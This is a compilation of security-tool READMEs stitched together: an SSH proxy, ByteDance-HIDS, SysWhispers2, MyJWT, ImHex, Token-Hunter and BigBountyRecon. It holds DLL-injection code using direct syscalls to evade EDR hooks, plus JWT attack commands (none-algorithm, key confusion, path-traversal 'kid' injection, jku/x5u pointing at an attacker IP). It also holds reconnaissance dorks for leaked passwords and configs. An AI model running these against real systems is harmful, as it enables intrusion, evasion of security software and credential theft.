• base class:ssh_proxy_server.forwarders.scp.SCPBaseForwarder
• default:ssh_proxy_server.forwarders.scp.SCPForwarder

• ssh_proxy_server.forwarders.scp.SCPForwarder - transfer file between client and server
• ssh_proxy_server.plugins.scp.store_file.SCPStorageForwarder - save file to file system
• ssh_proxy_server.plugins.scp.replace_file.SCPReplaceFile - replace transfered file with another file

• cmd argument:--sftp-handler
• base class:ssh_proxy_server.forwarders.sftp.SFTPHandlerBasePlugin
• default:ssh_proxy_server.forwarders.sftp.SFTPHandlerPlugin

• ssh_proxy_server.forwarders.sftp.SFTPHandlerPlugin - transfer file between client and server
• ssh_proxy_server.plugins.sftp.store_file.SFTPHandlerStoragePlugin - save file to file system
• ssh_proxy_server.plugins.sftp_replace.SFTPProxyReplaceHandler - replace transfered file with another file

• cmd argument:--authenticator
• base class:ssh_proxy_server.authentication.Authenticator
• default:ssh_proxy_server.authentication.AuthenticatorPassThrough

• ssh_proxy_server.authentication.AuthenticatorPassThrough - default authenticator, which can reuse credentials

Currently, only one authenticator (AuthenticatorPassThrough) exists, but it supports arguments to specify remote host, username and password, which shlould fit most scenarios. (public keys are on the roadmap)

• Manfred Kaiser
• Simon Böhm

ByteDance-HIDS is a Cloud-Native Host-Based Intrusion Detection solution project to provide next-generation Threat Detection and Behavior Audition with modern architecture.

ByteDance-HIDS comprises three major components：

• ByteDance-HIDS Agent, co-worked with ByteDance-HIDS Driver, is the game-changer for the Data Collection market. It works at both Kernel and User Space of Linux System, providing rich data flow with much better performance.
• ByteDance-HIDS Server provides Service-Discovery for the production environment of up to millions of agents. The Server also supports primary data formatting along with rules distribution for the Agent.
• ByteDance-HIDS HUB provides high-performance, lightweight, and stateless alert generation with data manipulation to analyze the rich data flow.

• Better performance Data/Information are collected in kernel space to avoid additional supplement actions such as traversal of '/proc' directory or collecting from other audition processes such as "auditd".
• Hard to be bypassed A specifically designed kernel driver powers data/Information collection, making it virtually impossible for malicious software, like rootkit, to evade detection or audition. The Driver could capture even evasion behavior itself.
• Kernel + User Space ByteDance-HIDS Agent provides User Space detection abilities, including file audition, in-house rule detection, and primary allowlists.
• Easy to be integrated ByteDance-HIDS could empower any User Space agents far beyond Host Intrusion usages with the detailed and reliable data flow. A wide user action audition could benefit both Behavior Analysis and Compliance requests. When integrated with NIDS, security analyzers could build a comprehensive Provenance Graph from the network connections, along with high traceable process trees and file auditions.

Currently, we are only open-sourcing ByteDance-HIDS Agent && Driver. Both components have been deployed and tested in production environments for months. We welcome any suggestions and cooperation.

• ByteDance-HIDS Driver
  
• ByteDance-HIDS Agent
  

• ByteDance-Server is under development. More Features are on the way.

SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls.

All core syscalls are supported and example generated files available in the example-output/ folder.

The usage is almost identical to SysWhispers1 but you don't have to specify which versions of Windows to support. Most of the changes are under the hood. It no longer relies on @j00ru's syscall tables, and instead uses the "sorting by system call address" technique popularized by @modexpblog. This significantly reduces the size of the syscall stubs.

The specific implementation in SysWhispers2 is a variation of @modexpblog's code. One difference is that the function name hashes are randomized on each generation. @ElephantSe4l, who had published this technique earlier, has another implementation based in C++17 which is also worth checking out.

The original SysWhispers repository is still up but may be deprecated in the future.

Various security products place hooks in user-mode API functions which allow them to redirect execution flow to their engines and detect for suspicious behaviour. The functions in ntdll.dll that make the syscalls consist of just a few assembly instructions, so re-implementing them in your own implant can bypass the triggering of those security product hooks. This technique was popularized by @Cn33liz and his blog post has more technical details worth reading.

SysWhispers provides red teamers the ability to generate header/ASM pairs for any system call in the core kernel image (ntoskrnl.exe). The headers will also include the necessary type definitions.

> git clone https://github.com/jthuraisamy/SysWhispers2.git
> cd SysWhispers2
> py .\syswhispers.py --help

# Export all functions with compatibility for all supported Windows versions (see example-output/).
py .\syswhispers.py --preset all -o syscalls_all

# Export just the common functions (see below for list).
py .\syswhispers.py --preset common -o syscalls_common

# Export NtProtectVirtualMemory and NtWriteVirtualMemory with compatibility for all versions.
py .\syswhispers.py --functions NtProtectVirtualMemory,NtWriteVirtualMemory -o syscalls_mem

PS C:\Projects\SysWhispers2> py .\syswhispers.py --preset common --out-file syscalls_common

                  .                         ,--. 
,-. . . ,-. . , , |-. o ,-. ,-. ,-. ,-. ,-.    / 
`-. | | `-. |/|/  | | | `-. | | |-' |   `-. ,-'  
`-' `-| `-' ' '   ' ' ' `-' |-' `-' '   `-' `--- 
     /|                     |  @Jackson_T                 
    `-'                     '  @modexpblog, 2021

SysWhispers2: Why call the kernel when you can whisper?

Common functions selected.

Complete! Files written to:
        syscalls_common.h
        syscalls_common.c
        syscalls_common_stubs.asm

py .\syswhispers.py -f NtAllocateVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx -o syscalls

#include <Windows.h>

void InjectDll(const HANDLE hProcess, const char* dllPath)
{
    LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, strlen(dllPath), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID lpStartAddress = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");

    WriteProcessMemory(hProcess, lpBaseAddress, dllPath, strlen(dllPath), nullptr);
    CreateRemoteThread(hProcess, nullptr, 0, (LPTHREAD_START_ROUTINE)lpStartAddress, lpBaseAddress, 0, nullptr);
}

#include <Windows.h>
#include "syscalls.h" // Import the generated header.

void InjectDll(const HANDLE hProcess, const char* dllPath)
{
    HANDLE hThread = NULL;
    LPVOID lpAllocationStart = nullptr;
    SIZE_T szAllocationSize = strlen(dllPath);
    LPVOID lpStartAddress = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");

    NtAllocateVirtualMemory(hProcess, &lpAllocationStart, 0, (PULONG)&szAllocationSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    NtWriteVirtualMemory(hProcess, lpAllocationStart, (PVOID)dllPath, strlen(dllPath), nullptr);
    NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, hProcess, lpStartAddress, lpAllocationStart, FALSE, 0, 0, 0, nullptr);
}

Using the --preset common switch will create a header/ASM pair with the following functions:

• NtCreateProcess (CreateProcess)
• NtCreateThreadEx (CreateRemoteThread)
• NtOpenProcess (OpenProcess)
• NtOpenThread (OpenThread)
• NtSuspendProcess
• NtSuspendThread (SuspendThread)
• NtResumeProcess
• NtResumeThread (ResumeThread)
• NtGetContextThread (GetThreadContext)
• NtSetContextThread (SetThreadContext)
• NtClose (CloseHandle)
• NtReadVirtualMemory (ReadProcessMemory)
• NtWriteVirtualMemory (WriteProcessMemory)
• NtAllocateVirtualMemory (VirtualAllocEx)
• NtProtectVirtualMemory (VirtualProtectEx)
• NtFreeVirtualMemory (VirtualFreeEx)
• NtQuerySystemInformation (GetSystemInfo)
• NtQueryDirectoryFile
• NtQueryInformationFile
• NtQueryInformationProcess
• NtQueryInformationThread
• NtCreateSection (CreateFileMapping)
• NtOpenSection
• NtMapViewOfSection
• NtUnmapViewOfSection
• NtAdjustPrivilegesToken (AdjustTokenPrivileges)
• NtDeviceIoControlFile (DeviceIoControl)
• NtQueueApcThread (QueueUserAPC)
• NtWaitForMultipleObjects (WaitForMultipleObjectsEx)

1. Copy the generated H/C/ASM files into the project folder.
2. In Visual Studio, go to Project→ Build Customizations... and enable MASM.
3. In the Solution Explorer, add the .h and .c/.asm files to the project as header and source files, respectively.
4. Go to the properties of the ASM file, and set the Item Type to Microsoft Macro Assembler.
5. Ensure that the project platform is set to x64. 32-bit projects are not supported at this time.

• Only 64-bit Windows is supported at this time.
• System calls from the graphical subsystem (win32k.sys) are not supported.
• Tested on Visual Studio 2019 (v142) with Windows 10 SDK.

• Type redefinitions errors: a project may not compile if typedefs in syscalls.h have already been defined.
  • Ensure that only required functions are included (i.e. --preset all is rarely necessary).
  • If a typedef is already defined in another used header, then it could be removed from syscalls.h.

Developed by @Jackson_T and @modexpblog, but builds upon the work of many others:

• @FoxHex0ne for cataloguing many function prototypes and typedefs in a machine-readable format.
• @PetrBenes, NTInternals.net team, and MSDN for additional prototypes and typedefs.
• @Cn33liz for the initial Dumpert POC implementation.

• @modexpblog: Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams
• @hodg87: Malware Mitigation when Direct System Calls are Used
• @Cn33liz: Combining Direct System Calls and sRDI to bypass AV/EDR (Code)
• @0x00dtm: Userland API Monitoring and Code Injection Detection
• @0x00dtm: Defeating Userland Hooks (ft. Bitdefender) (Code)
• @mrgretzky: Defeating Antivirus Real-time Protection From The Inside
• @SpecialHoang: Bypass EDR’s memory protection, introduction to hooking (Code)
• @xpn and @domchell: Silencing Cylance: A Case Study in Modern EDRs
• @mrjefftang: Universal Unhooking: Blinding Security Software (Code)
• @spotheplanet: Full DLL Unhooking with C++
• @hasherezade: Floki Bot and the stealthy dropper
• @hodg87: Latest Trickbot Variant has New Tricks Up Its Sleeve

• @JFaust_: Process Injection Part 1, Part 2, and Alaris loader project (Code)
• @0xPat: Malware Development Part 2
• @brsn76945860: Implementing Syscalls In The CobaltStrike Artifact Kit
• @Cn33liz and @_DaWouw: Direct Syscalls in Beacon Object Files (Code)

This cli is for pentesters, CTF players, or dev.
You can modify your jwt, sign, inject ,etc...
Check Documentation for more information.
If you see problems or enhancement send an issue.I will respond as soon as possible. Enjoy :)

Documentation is available at http://myjwt.readthedocs.io

• copy new jwt to clipboard
• user Interface (thanks questionary)
• color output
• modify jwt (header/Payload)
• None Vulnerability
• RSA/HMAC confusion
• Sign a jwt with key
• Brute Force to guess key
• crack jwt with regex to guess key
• kid injection
• Jku Bypass
• X5u Bypass

To install myjwt, simply use pip:

pip install myjwt

To run mywt from a docker image, run:

docker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

# mount volume for wordlist
docker run -v $(pwd)/wordlist:/home/wordlist/  -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt
# On Windows
docker run -v %CD%/wordlist:/home/wordlist/  -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

To install myjwt, on git:

git clone https://github.com/mBouamama/MyJWT.git
cd ./MyJWT
pip install -r requirements.txt
python MyJWT/myjwt_cli.py --help

To install myjwt on BlackArch:

pacman -S myjwt

$ myjwt --help
Usage: myjwt [OPTIONS] JWT

  This cli is for pentesters, CTF players, or dev.
  You can modify your jwt, sign, inject ,etc...
  Full documentation is at http://myjwt.readthedocs.io.
  If you see problems or enhancement send an issue.I will respond as soon as possible.
  Enjoy :)
  All new jwt will be copy to the clipboard.

Options:
  --version                    Show the version and exit.
  --full-payload TEXT          New payload for your jwt.Json format Required.
  -h, --add-header TEXT        Add a new key, value to your jwt header, if key
                               is present old value will be replaced.Format:
                               key=value.

  -p, --add-payload TEXT       Add a new key, value to your jwt payload, if
                               key is present old value    will be
                               replaced.Format: key=value.

  --sign TEXT                  Sign Your jwt with key given.
  --verify TEXT                verify your key.
  -none, --none-vulnerability  Check None Alg vulnerability.
  --hmac PATH                  Check RS/HMAC Alg vulnerability.
  --bruteforce PATH            Bruteforce to guess the secret used to sign the
                               token.

  -c, --crack TEXT             regex to iterate all string possibilities to
                               guess the secret used to sign the token.

  --kid TEXT                   Kid Injection sql
  --jku TEXT                   Jku Header to bypass authentication
  --x5u TEXT                   X5u Header to bypass authen   tication
  --crt TEXT                   For x5cHeader, force crt file
  --key TEXT                   For jku or x5c Header, force private key to
                               your key file

  --file TEXT                  For jku Header and x5u Header, force file name
  --print                      Print Decoded JWT
  -u, --url TEXT               Url to send your jwt.
  -m, --method TEXT            Method use for send request to url.(Default
                               GET).

  -d, --data TEXT              Data send to your url.Format: key=value. if
                               value = MY_JWT value will be replace by new
                               jwt.

  -c, --cookies TEXT           Cookies to send to your url.Format: key=value.
                               if value = MY_JWT value will be replace by new
                                  jwt.

  --help                       Show this message and exit.

• Modify Your jwt
• None Vulnerabilty Check
• Sign Key
• Brute Force Signature
• RSA/HMAC Confusion
• Kid Injection
• Send your new Jwt to url
• Jku Vulnerability
• X5u Vulnerability

myjwt YOUR_JWT --add-payload "username=admin" --add-header "refresh=false"

from myjwt.modify_jwt import add_header, change_payload
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt

jwt_json = jwt_to_json(jwt)
jwt_json = add_header(jwt_json, {"kid": "001"})
jwt_json = change_payload(jwt_json, {"username": "admin"})
jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]

Full example here: 01-modify-jwt

myjwt YOUR_JWT --none-vulnerability

from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt
from myjwt.vulnerabilities import none_vulnerability
jwt_json = jwt_to_json(jwt)
jwt = none_vulnerability(encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE])

Full example here: 02-none-vulnerability

myjwt YOUR_JWT --sign YOUR_KEY

from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
key = "test"
jwt = signature(jwt_to_json(jwt), key)

Full example here: 03-sign-key

myjwt YOUR_JWT --bruteforce PATH

from myjwt.vulnerabilities import bruteforce_wordlist
wordlist = "../../wordlist/common_pass.txt"
key = bruteforce_wordlist(jwt, wordlist)

Full example here: 04-brute-force

myjwt YOUR_JWT --crack REGEX

myjwt YOUR_JWT --hmac FILE

from myjwt.vulnerabilities import confusion_rsa_hmac
file = "public.pem"
jwt = confusion_rsa_hmac(jwt, file)

Full example here: 05-rsa-hmac-confusion

myjwt YOUR_JWT --kid INJECTION

from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
from myjwt.vulnerabilities import inject_sql_kid

injection = "../../../../../../dev/null"
sign = ""
jwt = inject_sql_kid(jwt, injection)
jwt = signature(jwt_to_json(jwt), sign)

Full example here: 06-kid-injection

myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --non-vulnerability --add-payload "username=admin"

myjwt YOUR_JWT --jku YOUR_URL

from myjwt.vulnerabilities import jku_vulnerability
new_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(jwt)

Full example here: 07-jku-bypass

myjwt YOUR_JWT --x5u YOUR_URL

from myjwt.vulnerabilities import x5u_vulnerability
newJwt = x5u_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(jwt)

Full example here: 08-x5u-bypass

Check github releases. Latest is available at https://github.com/mBouamama/MyJWT/releases/latest

• Fork this repository or clone it
• Create a new branch (feature, hotfix, etc...)
• Make necessary changes and commit those changes
• Check lint with make flake8
• Check unit_test with make test
• Send Pull Request I will check as Soon as Possible.

The log's become rather long. It moved to its own file.

See CHANGES.

A Hex Editor for Reverse Engineers, Programmers and people that value their eye sight when working at 3 AM.

• Featureful hex view
  • Byte patching
  • Patch management
  • Copy bytes as feature
    • Bytes
    • Hex string
    • C, C++, C#, Rust, Python, Java & JavaScript array
    • ASCII-Art hex view
    • HTML self contained div
  • String and hex search
  • Colorful highlighting
  • Goto from start, end and current cursor position
• Custom C++-like pattern language for parsing highlighting a file's content
  • Automatic loading based on MIME type
  • arrays, pointers, structs, unions, enums, bitfields, using declarations, little and big endian support, conditionals and much more!
  • Useful error messages, syntax highlighting and error marking
• Data importing
  • Base64 files
  • IPS and IPS32 patches
• Data exporting
  • IPS and IPS32 patches
• Data inspector allowing interpretation of data as many different types (little and big endian)
• Huge file support with fast and efficient loading
• String search
  • Copying of strings
  • Copying of demangled strings
• File hashing support
  • CRC16 and CRC32 with custom initial values and polynomials
  • MD4, MD5
  • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
• Disassembler supporting many different architectures
  • ARM32 (ARM, Thumb, Cortex-M, AArch32)
  • ARM64
  • MIPS (MIPS32, MIPS64, MIPS32R6, Micro)
  • x86 (16-bit, 32-bit, 64-bit)
  • PowerPC (32-bit, 64-bit)
  • SPARC
  • IBM SystemZ
  • xCORE
  • M68K
  • TMS320C64X
  • M680X
  • Ethereum
• Bookmarks
  • Region highlighting
  • Comments
• Data Analyzer
  • File magic-based file parser and MIME type database
  • Byte distribution graph
  • Entropy graph
  • Highest and avarage entropy
  • Encrypted / Compressed file detection
• Helpful tools
  • Itanium and MSVC demangler
  • ASCII table
  • Regex replacer
  • Mathematical expression evaluator (Calculator)
  • Hexadecimal Color picker
• Built-in cheat sheet for pattern language and Math evaluator
• Doesn't burn out your retinas when used in late-night sessions

The custom C-like Pattern Language developed and used by ImHex is easy to read, understand and learn. A guide with all features of the langauge can be found in the wiki or a simpler version in ImHex under Help -> Pattern Language Cheat Sheet

For format patterns, includable libraries and magic files, check out the ImHex-Patterns repository. Feel free to PR your own files there as well!

See latest nightly builds on the artifacts result of the Build action here.

NOTE: We currently only provide nightly builds for macOS (x86_64)

You need a C++20 compatible compiler such as GCC 10.2.0 to compile ImHex. Moreover, the following dependencies are needed for compiling ImHex:

• GLFW3
• libmagic, libgnurx, libtre, libintl, libiconv
• libcrypto
• capstone
• nlohmann json
• Python3
• freetype2
• Brew (macOS only)

Find all-in-one dependency installation scripts for Arch Linux, Fedora, Debian/Ubuntu and/or MSYS2 in dist.

After all the dependencies are installed, run the following commands to build ImHex:

mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release ..
make -j

To create a standalone zipfile on Windows, get the Python standard library (e.g. from https://github.com/python/cpython/tree/master/Lib) and place the files and folders in lib/python3.8 next to your built executable. Don't forget to also copy the libpython3.8.dll and libwinpthread-1.dll from your mingw setup next to the executable.

On both Windows and Linux:

• Copy the files from python_libs in the lib folder next to your built executable.
• Place your magic databases in the magic folder next to your built executable
• Place your patterns in the pattern folder next to your built executable
• Place your include pattern files in the include folder next to your built executable

To build ImHex on macOS, run the following commands:

brew bundle --no-lock --file dist/Brewfile
mkdir build
cd build
CC=$(brew --prefix llvm)/bin/clang CXX=$(brew --prefix llvm)/bin/clang++ PKG_CONFIG_PATH="$(brew --prefix openssl)/lib/pkgconfig":"$(brew --prefix)/lib/pkgconfig" cmake -DCMAKE_BUILD_TYPE=Release ..
make -j

• Thanks a lot to ocornut for their amazing Dear ImGui which is used for building the entire interface
  • Thanks to orconut as well for their hex editor view used as base for this project.
  • Thanks to BalazsJako for their incredible ImGuiColorTextEdit used for the pattern language syntax highlighting
  • Thanks to AirGuanZ for their amazing imgui-filebrowser used for loading and saving files
• Thanks to nlohmann for their json library used for project files
• Thanks to aquynh for capstone which is the base of the disassembly window

Collect OSINT for GitLab groups and members and search the group and group members' snippets, issues, and issue discussions for sensitive data that may be included in these assets. The information gathered is intended to compliment and inform the use of additional tools such as TruffleHog or GitRob, which search git commit history using a similar technique of regular expression matching.

Start by providing a group ID for a specific group on GitLab. You can find the group ID underneath the group name in the GitLab UI. Token-Hunter will use the GitLab group ID to find all associated projects for that group and, optionally, the groups members personal projects. Configure the tool to look for sensitive data in assets related to the projects it finds. Token-Hunter uses the same set of regular expressions as TruffleHog with a few additions for GitLab specific tokens. Token-Hunter depends on these easily configurable regular expressions for accuracy and effectiveness. Currently, the tool supports GitLab snippets, issues, and issue discussions with plans for future expansion to other assets. The tool is intended to be very configurable to allow for efficient discovery of sensitive data in the assets you're specifically interested in.

Before running the tool, you will need to generate a GitLab Personal Access Token (PAT) and export it as an environment variable. This can be done as shown below (please select api in the scopes section):

export GITLAB_API_TOKEN=xxxxx

Next, clone the repository and install dependencies with:

git clone https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter.git
pip3 install -r ./requirements.txt

Then, you can run the tool and specify your options as follows:

usage: token-hunter.py [-h] -g GROUP [-u URL] [-m] [-s] [-i] [-r] [-t]
                       [-p PROXY] [-c CERT] [-l LOGFILE]

Collect OSINT for GitLab groups and members. Optionally search the group and
group members snippets, project issues, and issue discussions/comments for
sensitive data.

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     An optional argument to specify the base URL of your
                        GitLab instance. If the argument is not supplied, its
                        defaulted to 'https://gitlab.com'
  -m, --members         Include group members personal projects and their
                        related assets in the searchfor sensitive data.
  -s, --snippets        Searches found projects for GitLab Snippets with
                        sensitive data.
  -i, --issues          Searches found projects for GitLab Issues and
                           discussions/comments with sensitive data.
  -r, --mergerequests   Searches found projects for GitLab Merge Requests and
                        discussions/comments with sensitive data.
  -t, --timestamp       Disables display of start/finish times and originating
                        IP to the output
  -p PROXY, --proxy PROXY
                        Proxies all requests using the provided URI matching
                        the scheme: http(s)://user:pass@10.10.10.10:8000
  -c CERT, --cert CERT  Used in tandem with -p (--proxy), this switch provides
                        a fully qualified path to a certificate to verify TLS
                        connections. Provide a fully qualified path to the
dynamic cert. Example:
                        /Users/<username>/owasp_zap_root_ca.cer.
     -l LOGFILE, --logfile LOGFILE
                        Will APPEND all output to specified file.

required arguments:
  -g GROUP, --group GROUP
                        ID or HTML encoded name of a GitLab group. This
                        option, by itself, will display group projects and
                        member names only.

./token-hunter.py -g 123456

The simplest use case is to return all the project URLs associated with a group by providing the group ID with the -g switch. You can find the group ID underneath the group name in the GitLab UI. No token searches are performed with this configuration.

./token-hunter.py -g 123456 -m

Finds all projects for group 123456 as well as all of the personal projects for the group members. No token searches are performed with this configuration.

./token-hunter.py -g 123456 -ms

Finds all projects for group 123456 as well as all of the personal projects for the group members. The -s switch tells Token-Hunter to search GitLab snippets associated with each found project for sensitive data.

./token-hunter.py -g 123456 -msir

Finds all projects for group 123456 as well as all of the personal projects for the group members. The -s switch tells Token-Hunter to search GitLab snippets associated with each found project for sensitive data. The -i switch tells Token-Hunter to also search issues and discussions for each of the found projects for sensitive data. The -r switch tells Token-Hunter to also search merge requests and merge request discussions for each of the found projects. CAUTION: This configuration has the potential to pull a lot of data!

./token-hunter.py -g 123456 -msit -u https://mygitlab-instance.com -p http://127.0.01:8080 -c /Users/hacker/owasp_zap_ca_cert.cer -l ./appended-output.txt

Performs the same asset searches as the previous example against a self-hosted installation of GitLab running at https://mygitlab-instance.com. Requests and responses that the tool generates are proxied through http://127.0.01:8080 using the certificate defined at the fully qualified path /Users/hacker/owasp_zap_ca_cert.cer to decrypt the TLS traffic. Timestamps and origin IP are excluded from the output with the -t switch. Output is APPENDED to the ./appended-output.txt file with the -l switch.

Contributions are welcome from the community. You can find and add to the issue list, submit merge requests, and add to the existing discussions. Token-Hunter is written in python 3. To make a code contribution:

1. Install python version 3
2. Install pip version 3 to manage dependencies using the guide above.
3. Clone the repository
4. In the root directory, install dependencies with pip3 install -r ./requirements.txt
5. Create a branch for the changes you'd like to make.
6. Modify or add test coverage in the existing ./test_* files, adding new files as needed.
7. Execute tests, written in pytest, with pytest -v to make sure they pass.
8. Create a merge requests for your changes and tag @gitlab-red-team to review and merge it.
9. Repeat!

BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation. Reconnaissance is the most important step in any penetration testing or a bug hunting process. It provides an attacker with some preliminary knowledge on the target organisation. Furthermore, it will be useful to gain insights into what controls are in place as well as some rough estimations on the security maturity level of the target organisation.

This tool can be used in addition to your usual approach for bug hunting. The idea is to quickly check and gather information about your target organisation without investing time and remembering these syntaxes. In addition, it can help you define an approach towards finding some quick wins on the target.

Any suggestions or ideas for this tool are welcome - just tweet me on @ManiarViral

1. Directory Listing: Finding open directories using Google Dork on your target organisation helps one to understand the directory structure on the webserver. It may reveal sensitive information or it may lead to information disclosure.

2. Configuration Files: Often times configuration files contains sensitive information such as hardcoded passwords, sensitive drive locations or API tokens which can help you gain privilege access to the internal resources.

3. Database Files: Database Files are data files that are used to store the contents of the database in a structured format into a file in separate tables and fields. Depending on the nature of the web application these files could provide access to sensitive information.

4. WordPress: WordPress is an open-source CMS written in PHP. WordPress has thousands of plugins to build, customise and enhance the websites. There are numerous vulnerabilities in these plugins. Finding WordPress related

5. Log Files: Log files sometimes provide detailed information of the users' activities in a particular application. These files are good to look at session cookies or other types of tokens.

6. Backup and Old Files: Backup files are original copies of the critical systems. These provide access to PII or access to sensitive records.

7. Login Pages: It is extremely important to identify login pages of your target organisation to perform bruteforce attempts or trying default credentials to gain further access to organisation resources.

8. SQL Errors: SQL errors leaks sensitive information about the backend systems. This can help one to perform enumeration on the database types and see if the application is vulnerable to input validation related attacks such as SQL Injection.

9. Apache Config Files: Apache HTTP Server is configured by placing directives in plain text configuration files. The main configuration file is usually called httpd.conf. In addition, other configuration files may be added using the Include directive, and wildcards can be used to include many configuration files. Any directive may be placed in any of these configuration files. Depending on the entries in these config files it may reveal database connection strings, username and passwords, the internal workings, used and referenced libraries and business logic of application.

10. Robots.txt File: Robots.txt file instructs web robots how to crawl pages on their website. Depending on the content of the file, an attacker might discover hidden directories and files.

11. DomainEye: DomainEye is a domain/host investigation tool that has the largest domain databases. They provide services such as reverse Whois, reverse IP lookup, as well as reverse NS and MX.

12. Publicly Exposed Documents: Such documents can be used to extract metadata information.

13. phpinfo(): Exposing phpinfo() on its own isn't necessarily a risk, but in combination with other vulnerabilities could lead to your site becoming compromised. Additionally, module versions could make attackers life easier when targeting application using newly discovered exploits.

14. Finding Backdoors: This can help one to identify website defacements or server hijacking related issues. By exploiting the open redirect vulnerability on the trusted web application, the attacker can redirect victims to a phishing page.

15. Install/Setup Files: Such files allows an attacker to perform enumeration on the target organisation. Information gathered using these files can help discover version details which can then be used to perform the targeted exploit.

16. Open Redirects: With these, we look at various known parameters vulnerable to open redirect related issues.

17. Apache Struts RCE: Successfully exploiting an RCE vulnerability could allow the attacker to run arbitrary programs. Here, we are looking for files with extensions of ".action" or ".do".

18. 3rd Party Exposure: Here we are looking for exposure of information on third party sites such as Codebeautify, Codeshare and Codepen.

19. Check Security Headers: Identify quickly if the target site is using security related headers in the server response.

20. GitLab: Quickly look for sensitive information on the GitLab.

21. Find Pastebin Entries: Shows you the results related to the target organisation on the Pastebin site. This could be passwords or any other sensitive information related to the target organisation.

22. Employees on LINKEDIN: Identifying employee names on LinkedIn can help you build a username list when it comes to password spraying attack.

23. .HTACCESS / Sensitive Files: Look for sensitive file exposure. This may indicate a server misconfiguration.

24. Find Subdomains: Subdomain helps you expand the attack surface on the target organisation. There are numerous tools available to automate the process of subdomain enumeration.

25. Find Sub-Subdomains: Identify sub-sub domains on the target organisation using Google Dork,

26. Find WordPress related exposure: WordPress related exposure helps you gain access to sensitive files and folders.

27. BitBucket & Atlassian: Source code leakage, hardcoded credentials and access to cloud infrastructure.

28. PassiveTotal: PassiveTotal is a great tool to perform threat investigation. Using BigBountyRecon we will use PassiveTotal to identify subdomains on the target information.

29. Stackoverflow: Source code exposure or any technology-specific questions mentioned on the Stackoverflow.

30. Find WordPress related exposure using Wayback Machine: Look for archieved WordPress files using WaybackMachine.

31. GitHub: Quickly look for sensitive information on the GitHub.

32. OpenBugBounty: Look for publicly exposed security issues on the OpenBugBounty website.

33. Reddit: Information about the particular organisation on the Reddit platform.

34. Crossdomain.xml: Look for misconfigured crossdomain.xml files on the target organisation.

35. ThreatCrowd: Search engine for threats, however, we are going to use this to identify additional sub-domains.

36. .git Folder: Source code exposure. it's possible to download the entire repository content if accessible.

37. YouTube: Look for any recent news on Youtube.

38. Digitalocean Spaces: Spaces is an S3-compatible object storage service that lets you store and serve large amounts of data. We will look for any data exposures.

39. .SWF File (Google): Flash is dead. We are going to use Google Dorks to look for older versions of flash .swf's which contain vulnerabilities.

40. .SWF File (Yandex): Flash is dead. We are going to use Yandex to look for older versions of flash .swf's which contain vulnerabilities.

41. .SWF File (Wayback Machine): Flash is dead. We are going to use WaybackMachine to look for older versions of flash .swf's which contain vulnerabilities.

42. Wayback Machine: Look for archived files to access old files.

43. Reverse IP Lookup: Reverse IP Lookup lets you discover all the domain names hosted on any given IP address. This will help you to explore the attack surface for a target organisation.

44. Traefik: Look for an open-source Edge Router for an unauthenticated interface which exposes internal services.

45. Cloud Storage and Buckets: Google CSE for various cloud storages - aws, digitalocean, backblaze, wasabi, rackspace, dropbox, ibm, azure, dreamhost, linode, gcp, box, mailru

46. s3 Buckets: Open s3 buckets.

47. PublicWWW: Source code search engine indexes the content of over 200 million web sites and provides a query interface that lets the caller find any alphanumeric snippet, signature or keyword in the web pages ‘HTML’, ‘JavaScript’ and ‘CSS’ style sheet code.

48. Censys (IPv4, Domains & Certs): Search engine for finding internet devices. We will use this to look for additional sub-domains using various endpoints on Censys.

49. Shodan: Search engine for Internet-connected devices

50. SharePoint RCE: Look for CVE-2020-0646 SharePoint RCE related endpoint.

51. API Endpoints: Find WSDL files.

52. Gist Searches: Quickly look for sensitive information on the Gist pastes.

53. CT Logs: Certificate Transparency (CT) is an Internet security standard and open-source framework for monitoring and auditing digital certificates. We will use to look for additional sub-domains for a targeted organisation.

54. Password Leak: Look for plaintext passwords of internal employees exposed in various leaks.

55. What CMS: Identify the version and type of CMS used by a target organisation for targeted enumeration and exploit research.

Search for plaintext passwords for a target organisation:

Looking for subdomains and other interesting information on the target organisation:

Finding Apache Struts related assets:

Verifying if the URL contains extenstion of ".do":

Step1: Download the file from Release section: https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe

Step2: Run the EXE file

Step3: Enter the target domain

Step4: Click on different buttons in the tool to find information

Step5: In case of Google Captcha simply click on the puzzle and move ahead

Twitter: https://twitter.com/maniarviral
LinkedIn: https://au.linkedin.com/in/viralmaniar

Table obtained from: https://exposingtheinvisible.org/guides/google-dorking/

Here is a table with possible dorks for various search engines.